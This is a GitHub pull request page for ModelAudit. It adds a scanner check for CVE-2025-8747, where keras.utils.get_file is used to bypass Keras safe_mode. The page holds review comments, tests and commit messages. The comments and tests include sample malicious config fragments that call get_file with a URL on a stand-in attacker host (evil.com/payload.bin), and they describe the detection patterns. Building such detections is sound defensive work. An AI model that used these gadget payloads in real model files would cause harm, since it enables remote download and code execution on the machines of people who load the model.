feat(security): detect CVE-2025-8747 get_file gadget bypass#602
feat(security): detect CVE-2025-8747 get_file gadget bypass#602yash2998chhabria merged 10 commits intomainfrom
Conversation
|
Note Reviews pausedIt looks like this branch is under active development. To avoid overwhelming you with review comments due to an influx of new commits, CodeRabbit has automatically paused this review. You can configure this behavior by changing the Use the following commands to manage reviews:
Use the checkboxes below for quick actions:
WalkthroughAdds CVE-2025-8747 detection to the Keras ZIP scanner by scanning config.json nodes for Changes
Sequence DiagramsequenceDiagram
participant Scanner as Keras ZIP Scanner
participant Parser as Config Parser
participant Iterator as Node Iterator
participant Matcher as Regex Matcher
participant Explanation as Explanation Function
participant Result as Result Collector
Scanner->>Parser: extract & parse config.json from ZIP
Parser-->>Scanner: config_data (dict/list)
Scanner->>Iterator: traverse config_data nodes
Iterator->>Matcher: present node/string values
Matcher-->>Iterator: match _GET_FILE_PATTERN?
alt get_file matched
Iterator->>Matcher: check for _URL_PATTERN in related nodes
Matcher-->>Iterator: URL matched?
alt URL matched in same context
Iterator->>Explanation: get_cve_2025_8747_explanation("get_file_gadget")
Explanation-->>Iterator: explanation text
Iterator->>Result: emit CRITICAL issue with CVE metadata
end
end
Scanner-->>Result: finalize and return scan results
Estimated code review effort🎯 3 (Moderate) | ⏱️ ~25 minutes Poem
🚥 Pre-merge checks | ✅ 3✅ Passed checks (3 passed)
✏️ Tip: You can configure your own custom pre-merge checks in the settings. ✨ Finishing Touches🧪 Generate unit tests (beta)
Comment |
There was a problem hiding this comment.
Actionable comments posted: 2
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In `@CHANGELOG.md`:
- Around line 8-12: There is a duplicate "[Unreleased]" section; remove the
duplicate block containing "### Security" and the bullet "- **keras:** detect
CVE-2025-8747 get_file gadget safe_mode bypass", then merge that bullet into the
existing "[Unreleased]" section by adding it under the existing "### Security"
subsection (or create "### Security" there if it doesn't exist) so only one
"[Unreleased]" header remains.
In `@tests/scanners/test_keras_zip_scanner.py`:
- Around line 422-431: The helper _make_keras_zip in class
TestCVE20258747GetFileGadget uses os.path.join(str(tmp_path), "model.keras");
change it to use pathlib by constructing the path with tmp_path / "model.keras"
and update any uses that expect a str (e.g., pass str(path) to zipfile.ZipFile
if needed) so the temporary path handling is consistent with other tests.
ℹ️ Review info
Configuration used: Repository UI
Review profile: ASSERTIVE
Plan: Pro
Disabled knowledge base sources:
- Linear integration is disabled
You can enable these sources in your CodeRabbit configuration.
📒 Files selected for processing (5)
CHANGELOG.mdmodelaudit/config/explanations.pymodelaudit/scanners/keras_zip_scanner.pytests/conftest.pytests/scanners/test_keras_zip_scanner.py
There was a problem hiding this comment.
Actionable comments posted: 1
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In `@tests/scanners/test_keras_zip_scanner.py`:
- Around line 422-431: The _make_keras_zip helper in
TestCVE20258747GetFileGadget is missing a type hint for the tmp_path parameter;
add a proper annotation (e.g., tmp_path: pathlib.Path or from pathlib import
Path then tmp_path: Path) to the method signature and ensure pathlib.Path is
imported at the top of the test file so the type hint resolves.
ℹ️ Review info
Configuration used: Repository UI
Review profile: ASSERTIVE
Plan: Pro
Disabled knowledge base sources:
- Linear integration is disabled
You can enable these sources in your CodeRabbit configuration.
📒 Files selected for processing (2)
CHANGELOG.mdtests/scanners/test_keras_zip_scanner.py
There was a problem hiding this comment.
Actionable comments posted: 1
♻️ Duplicate comments (1)
tests/scanners/test_keras_zip_scanner.py (1)
425-505:⚠️ Potential issue | 🟡 MinorAdd missing type hints in the new CVE test class methods.
Line 425 and Lines 433-505 introduce untyped
tmp_pathparameters (and no-> Noneon test methods), which violates the repository typing rule.🔧 Proposed fix
import base64 import json import os import tempfile import zipfile +from pathlib import Path @@ - def _make_keras_zip(self, config_str: str, tmp_path) -> str: + def _make_keras_zip(self, config_str: str, tmp_path: Path) -> str: @@ - def test_get_file_with_url_detected(self, tmp_path): + def test_get_file_with_url_detected(self, tmp_path: Path) -> None: @@ - def test_get_file_without_url_no_trigger(self, tmp_path): + def test_get_file_without_url_no_trigger(self, tmp_path: Path) -> None: @@ - def test_no_false_positive_normal_config(self, tmp_path): + def test_no_false_positive_normal_config(self, tmp_path: Path) -> None: @@ - def test_get_file_and_url_in_different_contexts_not_flagged(self, tmp_path): + def test_get_file_and_url_in_different_contexts_not_flagged(self, tmp_path: Path) -> None: @@ - def test_cve_attribution_details(self, tmp_path): + def test_cve_attribution_details(self, tmp_path: Path) -> None:#!/bin/bash python - <<'PY' import ast from pathlib import Path path = Path("tests/scanners/test_keras_zip_scanner.py") tree = ast.parse(path.read_text()) for node in ast.walk(tree): if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)): for arg in node.args.args: if arg.arg == "tmp_path" and arg.annotation is None: print(f"{path}:{node.lineno} {node.name} -> tmp_path missing annotation") PYAs per coding guidelines: "Always include type hints in Python code."
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@tests/scanners/test_keras_zip_scanner.py` around lines 425 - 505, The tests test_get_file_with_url_detected, test_get_file_without_url_no_trigger, test_no_false_positive_normal_config, and test_get_file_and_url_in_different_contexts_not_flagged are missing type hints for the tmp_path parameter and their return type; update each function signature to annotate tmp_path (e.g., tmp_path: Path | pytest.TempPathFactory or appropriate project convention) and add an explicit return type -> None so all functions comply with the repository typing rule.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In `@modelaudit/scanners/keras_zip_scanner.py`:
- Around line 273-281: The detection only inspects direct string values from the
mapping `node.values()` (variable `string_values`) and thus misses
list/tuple-valued gadget args like {"fn":"get_file","args":["https://..."]};
update the logic around `string_values`, `has_get_file`, and `has_url` so you
also extract and include strings found inside lists/tuples (and nested simple
containers) that are values of `node` before performing the `_GET_FILE_PATTERN`
and `_URL_PATTERN` checks; ensure you still use `_GET_FILE_PATTERN.fullmatch`,
the ".get_file" suffix check, and "keras.utils.get_file" substring check for any
discovered string entries so the `if not (has_get_file and has_url):` branch
behavior is preserved.
---
Duplicate comments:
In `@tests/scanners/test_keras_zip_scanner.py`:
- Around line 425-505: The tests test_get_file_with_url_detected,
test_get_file_without_url_no_trigger, test_no_false_positive_normal_config, and
test_get_file_and_url_in_different_contexts_not_flagged are missing type hints
for the tmp_path parameter and their return type; update each function signature
to annotate tmp_path (e.g., tmp_path: Path | pytest.TempPathFactory or
appropriate project convention) and add an explicit return type -> None so all
functions comply with the repository typing rule.
ℹ️ Review info
Configuration used: Repository UI
Review profile: ASSERTIVE
Plan: Pro
Disabled knowledge base sources:
- Linear integration is disabled
You can enable these sources in your CodeRabbit configuration.
📒 Files selected for processing (2)
modelaudit/scanners/keras_zip_scanner.pytests/scanners/test_keras_zip_scanner.py
There was a problem hiding this comment.
Actionable comments posted: 2
♻️ Duplicate comments (1)
modelaudit/scanners/keras_zip_scanner.py (1)
272-282:⚠️ Potential issue | 🟠 MajorDetection misses strings nested in list/tuple values.
At line 273,
string_valuesextracts only direct string values fromnode.values(). Gadget configurations like{"fn": "get_file", "args": ["https://evil.com"]}will not trigger detection because the URL is inside a list, not a direct dict value.🔧 Proposed fix to extract strings from list/tuple values
for context, node in self._iter_dict_nodes(model_config): string_values = [value for value in node.values() if isinstance(value, str)] + # Also extract strings from list/tuple values in the same context + for value in node.values(): + if isinstance(value, (list, tuple)): + string_values.extend(item for item in value if isinstance(item, str)) has_get_file = any( _GET_FILE_PATTERN.fullmatch(value.strip()) is not None or value.strip().lower().endswith(".get_file")Based on learnings: "Preserve or strengthen security detections; test both benign and malicious samples when modifying scanners".
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@modelaudit/scanners/keras_zip_scanner.py` around lines 272 - 282, The current detection in the loop over self._iter_dict_nodes(model_config) only collects direct string values into string_values so URLs inside list/tuple arguments are missed; update the extraction logic used where string_values is built (in the for context, node loop in keras_zip_scanner.py) to also iterate list/tuple values and collect any str items (or recursively flatten one level) into string_values before running the existing checks with _GET_FILE_PATTERN and _URL_PATTERN, preserving the same has_get_file and has_url checks; update/extend unit tests for the scanner to include cases like {"fn":"get_file","args":["https://evil.com"]} to ensure detection still triggers.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In `@modelaudit/scanners/keras_zip_scanner.py`:
- Around line 304-316: The docstring for _iter_dict_nodes currently says "Yield
all dict nodes" but the function returns a list; update the docstring to
accurately describe its behavior (e.g., "Return a list of all dict nodes with
their traversal path") so it matches the implementation in the _iter_dict_nodes
method.
In `@tests/scanners/test_keras_zip_scanner.py`:
- Around line 434-457: Add a sibling test case in
test_get_file_with_url_detected that covers the list-argument variant: construct
a config where the layer's "config" uses "fn": "get_file" and an "args" list
containing the URL (e.g., "args": ["https://evil.com/payload.bin"]), feed it
through the existing KerasZipScanner via self._make_keras_zip, then assert that
the result includes a CVE-2025-8747 issue and that its severity equals
IssueSeverity.CRITICAL (same expectations as the original test); place the new
assertions alongside the originals in the test_get_file_with_url_detected
function so it becomes a regression test for list-valued args handling.
---
Duplicate comments:
In `@modelaudit/scanners/keras_zip_scanner.py`:
- Around line 272-282: The current detection in the loop over
self._iter_dict_nodes(model_config) only collects direct string values into
string_values so URLs inside list/tuple arguments are missed; update the
extraction logic used where string_values is built (in the for context, node
loop in keras_zip_scanner.py) to also iterate list/tuple values and collect any
str items (or recursively flatten one level) into string_values before running
the existing checks with _GET_FILE_PATTERN and _URL_PATTERN, preserving the same
has_get_file and has_url checks; update/extend unit tests for the scanner to
include cases like {"fn":"get_file","args":["https://evil.com"]} to ensure
detection still triggers.
ℹ️ Review info
Configuration used: Repository UI
Review profile: ASSERTIVE
Plan: Pro
Disabled knowledge base sources:
- Linear integration is disabled
You can enable these sources in your CodeRabbit configuration.
📒 Files selected for processing (3)
CHANGELOG.mdmodelaudit/scanners/keras_zip_scanner.pytests/scanners/test_keras_zip_scanner.py
There was a problem hiding this comment.
Actionable comments posted: 4
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In `@modelaudit/scanners/keras_zip_scanner.py`:
- Around line 294-301: Add a "description" entry to the details dict for
CVE-2025-8747 so the CVE output matches other detections; locate the block that
builds details = { "cve_id": "CVE-2025-8747", ... } and add a concise
description string (e.g., describing arbitrary code execution via unsafe
deserialization in Keras versions 3.0.0–3.10.0) alongside the existing keys
"cvss", "cwe", and "remediation".
- Around line 272-283: The scanner currently flags dict nodes if any extracted
string contains both get_file-like patterns and URLs, but this produces false
positives when the node is mostly documentation; update the loop in the
model_config inspection (the block iterating with _iter_dict_nodes) to first
call _is_primarily_documentation(context or node) and skip evaluating the CVE
condition for nodes where _is_primarily_documentation(...) returns True,
otherwise continue with the existing extraction via _extract_string_literals and
the checks using _GET_FILE_PATTERN and _URL_PATTERN; ensure you reference the
same helper names (_iter_dict_nodes, _extract_string_literals,
_is_primarily_documentation, _GET_FILE_PATTERN, _URL_PATTERN) and keep behavior
unchanged for non-documentation nodes.
In `@tests/scanners/test_keras_zip_scanner.py`:
- Around line 434-553: All new test methods (test_get_file_with_url_detected,
test_get_file_with_url_in_args_list_detected,
test_get_file_without_url_no_trigger, test_no_false_positive_normal_config,
test_get_file_and_url_in_different_contexts_not_flagged,
test_cve_attribution_details) must annotate their tmp_path parameter as
tmp_path: Path and declare a return type -> None; update each function signature
accordingly and ensure Path is imported from pathlib at the top of the test file
if not present.
- Around line 423-557: Add a regression test in the TestCVE20258747GetFileGadget
class that verifies a malicious payload embedding a single comment token does
not suppress detection: implement a new test method (e.g.
test_get_file_with_url_and_comment_token_detected) that builds a config using
_make_keras_zip with a layer config containing "fn": "get_file" and a "url"
value that includes a single comment token embedded in the payload string, call
KerasZipScanner().scan(...) and assert that at least one issue references
"CVE-2025-8747", that the issue details["cve_id"] == "CVE-2025-8747", and that
the issue severity equals IssueSeverity.CRITICAL to ensure the scanner still
flags the case.
ℹ️ Review info
Configuration used: Repository UI
Review profile: ASSERTIVE
Plan: Pro
Disabled knowledge base sources:
- Linear integration is disabled
You can enable these sources in your CodeRabbit configuration.
📒 Files selected for processing (5)
CHANGELOG.mdmodelaudit/config/explanations.pymodelaudit/scanners/keras_zip_scanner.pytests/conftest.pytests/scanners/test_keras_zip_scanner.py
2beae8d to
097b702
Compare
…bypass Bypass of CVE-2025-1550 fix. Uses keras.utils.get_file as a gadget to download and execute arbitrary files even with safe_mode=True. Detected when config.json references get_file AND contains URL strings. - Add _check_get_file_gadget() to keras_zip_scanner - Flag get_file + URL combo as CRITICAL - Add explanation function for CVE-2025-8747 - 4 new tests (detection, no URL no trigger, no false positive, attribution) Co-Authored-By: Claude <noreply@anthropic.com>
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
- Fix nodes variable redefinition in _iter_dict_nodes(): declare nodes once before branches with type annotation, use plain assignment inside - Add tmp_path: Path annotation to _make_keras_zip() in test file and import Path from pathlib - Move [Unreleased] section before [0.2.26] in CHANGELOG and merge both Added and Fixed subsections under a single header Co-Authored-By: Claude <noreply@anthropic.com>
…lict The merge from main incorrectly deleted all CVE-2025-49655 TorchModuleWrapper detection code. This commit restores: - _check_torch_module_wrapper and _is_vulnerable_keras_3_11_x methods - get_cve_2025_49655_explanation function in explanations.py - keras_version extraction from metadata.json - TorchModuleWrapper detection in layer iteration loop - CHANGELOG and conftest.py entries that were incorrectly removed - Strengthened test assertions for cvss and remediation fields Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
Co-Authored-By: Claude <noreply@anthropic.com>
2cbccb3 to
fdf4d49
Compare
Summary
keras.utils.get_fileas a gadget to download and execute arbitrary files even withsafe_mode=Trueget_filereferences combined with URL patterns (http:///https://)Changes
modelaudit/scanners/keras_zip_scanner.py: Add_check_get_file_gadget()methodmodelaudit/config/explanations.py: Addget_cve_2025_8747_explanation()functiontests/scanners/test_keras_zip_scanner.py: 4 new teststests/conftest.py: Add keras_zip tests to Python 3.12 allowlistCHANGELOG.md: Add unreleased entryTest plan
🤖 Generated with Claude Code
Summary by CodeRabbit
Security
Tests
Changelog